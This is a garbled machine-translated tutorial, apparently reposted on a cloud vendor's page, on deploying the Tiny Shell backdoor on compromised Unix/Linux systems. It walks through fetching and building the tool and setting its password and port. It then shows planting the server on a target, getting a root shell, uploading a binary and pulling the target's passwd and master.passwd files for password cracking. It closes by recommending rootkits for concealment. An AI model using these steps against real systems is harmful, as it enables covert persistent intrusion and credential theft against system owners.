Tiny Shell Operating Instructions

Source: Internet
Author: User
Tags sha1 strcmp ssh

The Tiny shell is a lightweight standard remote shell tool that provides remote execution commands (including: RLOGIN,TELNET,SSH, etc.) and file transfer functions (upload, download), supports Single-byte, fully supports pseudo-terminal pairs (pty /tty) and other pseudo terminals.

First, the preface

With the development of the Internet, the use of unix/linux system more and more, and the invasion of a unix/linux system is no longer difficult. Usually, after the invasion succeeds, will leave one or a few back door, in order to enter again; for the unix/linux system, more types of back door, the primary has modified ". rhosts" file, copy a shell to a hidden directory, modify etc/passwd file plus users and other means. The higher level of MO is using the kernel module backdoor (Rootkit), it is the Unix/linux system under the highest level of the back door, perhaps the most covert, but today I do not say Rootkit, because it is too complex to use, for those who do not have the experience of unix/linux system, Even more difficult to drive the royal. and Tiny Shell as a running in the Unix/linux system under the lightweight Shell tool, not only small, but also support some other good features, please see below.

Second, the application

1,tiny Shell Introduction Tiny shell is a lightweight standard remote shell tool that provides remote execution commands (including: rlogin,telnet,ssh) and file transfer functions (upload, download), Support Single-byte, Fully support pseudo-terminal pairs (pty/tty) and other pseudo terminals. And the use of powerful 160-bit RC4 encryption to avoid sniffer detection with AES-128 + HMAC-SHA1 strong encryption and authentication. Support Freebsd,netbsd, Openbsd,solaris, Sunos,hp-ux,irix,cygwin,linux and other systems.

  2,tiny Shell Application test environment: Local: OpenBSD 3.4 ip:192.168.0.40 target: FreeBSD 4.9 Stable first download the ip:192.168.0.20 shell, unzip and modify the source code, in order to the tool More to meet our requirements. #fetch http://www.ringz.org/tsh-0.6.tgz #tar zxvf tsh-0.6.tgz #cd tsh-0.6 #ls changelog README aes.h pel.h sha1.h tsh.h Ma Kefile aes.c pel.c sha1.c tsh.c tshd.c #vi tsh.h char *secret = "Replace with your PassWord"; Connect the back door password, I modified for Dahubaobao. This backdoor main program is TSH.C, first look at the bottom of the source code if (PassWord = = NULL) {/* 1st try, using the built-in secret key/ret = Pel_client_init (serv Er, secret); if (ret!= pel_success) {close (server);/* Secret key invalid, so ask for a passWord */PassWord = Getpass ("PassWord: " ); Goto Connect; }//Emphasis here: RET = pel_client_init (server, secret); The secret variable is used as a parameter, which is the password required to connect to the back door. Now you know why you changed the TSH.H. #define SERVER_PORT 7586//Backdoor simple to listen to the port, arbitrarily modify if (argc = = 5 &&! strcmp (argv[2], "get")) {action = Get_file;} if (A RGC = 5 &&! strcmp (Argv[2], "put") {action = Put_file;}//This backdoor does not help information, so check here for download, put for upload. Of course, if you like, you can modify it yourself. Other than thatIf you want the back door to export help information, you can add a printf statement yourself to export the help information. Here is the simplest way to do it without any parameters./tsh, you will be prompted gethostbyname failed, and then look at the source code, find fprintf (stderr, "gethostbyname FAILED.N"); This code, smart you may have thought, is to modify gethostbyname failed. For the help you want, so that when you execute./tsh, the Help information is automatically exported. Oh, also calculate a disguised change it. Start compiling the source code below. #make Please specify one of the Targets:make Linux make FreeBSD make OpenBSD make NetBSD make Cygwin make SunOS make IR IX made HPUX make OSF #make OpenBSD//The corresponding selection according to your system, 10 seconds to compile (see Figure 1). Then, two executables, one client, one server, are generated in the current directory: Tsh,tshd. Now copy the TSHD to the target system (FreeBSD) and execute the./tshd to complete the installation. In order to more clearly indicate the environment I use, so go back to the local execution ID command, know that the user's uid=1000, is a regular user;/tsh 192.168.0.20来 target Host (for testing convenience, I will not add the password), OK, Now we have a root right shell, then use the ID command (note, this is on the target host), you can see Uid=0, this is the root authority Oh! Executes the uname–a command, echoing back to the FreeBSD system, which has been successfully connected to the back door and landed (see Figure 2). In addition, the backdoor can also insert the shell command at the time of the connection, the syntax is./tsh 192.168.0.20 "command", such as./tsh 192.168.0.20 "Cat etc/passwd", The meaning of this command is to connect the 192.168.0.20 target host, then execute the cat etc/passwd command so that we have a glance at the passwd file of the target host (Figure 3). Note, however, that using this form does not log on to the target host, just connect to the target host and then insert a shell command. Now let's look at how to use the upload and download. From the source code to know that the uploaded keyword is put, download the keyword for GET. OK, let's take a look at how to upload the file, execute the "./tsh 192.168.0.20 put filename target host directory" to complete the upload, but note that the file in the current directory, that is, and TSH in the same directory. I uploaded a back binary file, using the./tsh 192.168.0.20 put on/, this command is to upload the files to the target root directory, and then I use the./tsh 192.168.0.20 connect to the target host. LS to see if the back has been uploaded to the other host (Figure 4), Oh, not bad! In view of the download file, its syntax is "./tsh 192.168.0.20 Get target file local directory", now we come to obtain its most sensitive file----master.passwd ( Shadow file, which is the shadow file under Linux system. Execute./tsh 192.168.0.20 get Etc/master.passwd/home/dahubaobao, meaning to download the target host's master.passwd file to the local/home/dahubaobao directory, Then use LS to see, you can see the other side of the MASTER.PASSWD has been downloaded to the local (such as Figure 5), and then VI master.passwd (Figure 6), Haha, the user's encryption password is imminent. Hint, the FreeBSD user password is encrypted using MD5.

Summary

Tiny Shell, as a small shell tool, is no inferior to other shell tools, and supports most of the unix/linux system, it is definitely worth a try. Of course, this backdoor is not hidden, we can combine rootkit to strengthen (rootkit also provide shell tools, but not compared with tiny shell, do not believe you can try), rootkit use can go to Google to find the answer, this is not much to say.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.